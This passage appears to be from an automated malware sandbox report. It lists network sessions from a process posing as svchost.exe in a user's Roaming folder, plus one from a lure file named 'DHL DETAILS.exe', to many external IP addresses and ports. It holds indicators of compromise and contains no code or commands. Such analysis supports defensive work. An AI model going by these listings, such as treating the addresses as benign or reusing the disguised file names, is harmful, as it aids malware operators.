                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4678192.168.2.56401978.38.108.199108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4679192.168.2.56459443.131.246.771567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4680192.168.2.56459545.11.95.165521956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4681192.168.2.56460052.67.10.183312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4682192.168.2.564597203.95.198.170808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4683192.168.2.56458852.172.1.186312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4684192.168.2.5646158.222.164.2051567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4685192.168.2.563522195.169.35.214312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4686192.168.2.56461643.128.107.251888856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4687192.168.2.56464331.207.38.668043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4688192.168.2.56463443.155.130.1821567343080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4689192.168.2.564654184.170.248.5414543080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4690192.168.2.56463765.21.255.197312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4691192.168.2.564638120.76.42.209888843080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4692192.168.2.564048142.54.236.97414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4693192.168.2.564110103.83.178.205201656176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4694192.168.2.564645113.160.154.23808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4695192.168.2.564117138.36.150.15108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4696192.168.2.56466852.35.240.119108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4697192.168.2.564657221.153.92.398056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4698192.168.2.56454042.61.48.219800043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4699192.168.2.56465880.67.8.68056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4700192.168.2.564660121.128.194.1548056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4701192.168.2.56466347.243.114.192818056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4702192.168.2.56466258.234.116.1978056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4703192.168.2.56424627.123.1.35415343080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4704192.168.2.56469092.204.135.373252443080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4705192.168.2.56466743.133.70.571567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4706192.168.2.56467184.39.112.144312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4707192.168.2.56396945.195.149.79108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4708192.168.2.56431739.105.27.30312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4709192.168.2.5646868.218.231.621567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4710192.168.2.564144112.51.96.118909156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4711192.168.2.5646848.219.228.1001567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4712192.168.2.56472152.54.249.2418056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4713192.168.2.564740104.17.84.1508056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4714192.168.2.564682202.162.219.10108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4715192.168.2.564737162.214.225.2236345256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4716192.168.2.564325203.96.177.2113338243080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4717192.168.2.564732172.67.38.968043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4718192.168.2.564688103.49.202.2508043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4719192.168.2.564713185.104.112.628043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4720192.168.2.564778172.67.206.1058056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4721192.168.2.564767184.170.248.5414543080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4722192.168.2.564300117.160.250.133889956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4723192.168.2.564733211.222.252.1878056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4724192.168.2.56478354.152.3.368056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4725192.168.2.56444551.222.241.1573001156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4726192.168.2.564680117.160.250.134889943080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4727192.168.2.564789104.129.205.945432156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4728192.168.2.564240199.102.104.70414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4729192.168.2.56443045.182.176.38994756176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4730192.168.2.5636278.130.39.155338956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4731192.168.2.564393103.86.1.25414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4732192.168.2.56446345.4.202.999956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4733192.168.2.56476443.131.248.1651567343080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4734192.168.2.563630183.80.130.9414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4735192.168.2.56477143.131.246.771567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4736192.168.2.564768202.83.102.83808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4737192.168.2.564750193.151.130.114808656176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4738192.168.2.56482931.43.179.1608056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4739192.168.2.5647848.222.164.2051567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4740192.168.2.56479845.11.95.165521956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4741192.168.2.564404103.130.218.135400243080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4742192.168.2.56480345.81.232.17916556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4743192.168.2.56479943.128.107.251888856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4744192.168.2.564796203.95.198.170808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4745192.168.2.564835162.214.121.114676056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4746192.168.2.5647765.44.42.1155838656176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4747192.168.2.56479578.38.108.199108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4748192.168.2.56461972.210.221.197414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4749192.168.2.56455550.63.12.101295343080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4750192.168.2.56470164.227.108.253190856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4751192.168.2.564846162.159.242.1508056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4752192.168.2.56480163.250.52.10108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4753192.168.2.56480543.155.130.1821567343080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4754192.168.2.564720117.160.250.1328056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4755192.168.2.564789104.129.205.94543216352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4756192.168.2.56456251.89.173.402385443080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4757192.168.2.56480252.172.1.186312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4758192.168.2.564822121.171.57.2312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4759192.168.2.564823185.225.232.1918056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4760192.168.2.56483091.189.177.190312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4761192.168.2.56483980.67.8.68056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4762192.168.2.564832120.76.42.209888843080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4763192.168.2.564919172.67.181.1978043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4764192.168.2.564847155.185.15.56312843080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4765192.168.2.564852185.158.114.142569743080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4766192.168.2.564860110.12.211.1408043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4767192.168.2.564844221.153.92.398056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4768192.168.2.565072202.159.35.15344356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4769192.168.2.56460193.188.161.848056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4770192.168.2.56485789.36.114.388056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4771192.168.2.564968172.67.255.2248043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4772192.168.2.564896129.213.150.2058056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4773192.168.2.56485445.195.149.79108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4774192.168.2.564941192.154.244.92900056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4775192.168.2.564933184.169.154.1198056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4776192.168.2.56485543.133.70.571567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4777192.168.2.563749159.65.245.2558056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4778192.168.2.564849120.78.191.688056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4779192.168.2.56484158.234.116.1978056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4780192.168.2.564914172.67.53.2158056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4781192.168.2.564906162.214.227.685539256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4782192.168.2.565127202.159.35.15344356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4783192.168.2.565155202.159.35.15344356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4784192.168.2.565160202.159.35.15344356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4785192.168.2.564989104.20.75.1328056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4786192.168.2.56488627.96.235.1718043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4787192.168.2.56488458.246.58.150900256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4788192.168.2.564811196.204.24.254808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4789192.168.2.565019104.19.83.1288043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4790192.168.2.564938184.170.248.5414543080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4791192.168.2.56489715.236.106.236312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4792192.168.2.56485914.207.65.204808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4793192.168.2.56502250.62.134.1393691643080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4794192.168.2.564901219.243.212.118844356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4795192.168.2.56492346.35.9.1108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4796192.168.2.56493423.137.248.197888856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4797192.168.2.565040192.252.220.89414543080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4798192.168.2.56493145.138.87.238108043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4799192.168.2.56492113.229.47.1098056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4800192.168.2.564924202.162.219.10108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4801192.168.2.56491165.1.244.232108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4802192.168.2.565111164.92.86.1135056456176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4803192.168.2.564932203.171.19.988056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4804192.168.2.565137104.16.106.2348056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4805192.168.2.5650743.12.144.146312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4806192.168.2.56501718.134.236.231312843080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4807192.168.2.565198104.23.126.88056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4808192.168.2.565203104.17.37.2358056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4809192.168.2.56502095.164.89.123888843080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4810192.168.2.564936103.146.137.5108156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4811192.168.2.565220162.159.241.1608056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4812192.168.2.565044198.105.111.15669343080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4813192.168.2.56532945.144.30.20544356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4814192.168.2.56533345.144.30.20544356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4815192.168.2.56533445.144.30.20544356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4816192.168.2.56504546.17.63.166909143080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4817192.168.2.565069184.185.2.12414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


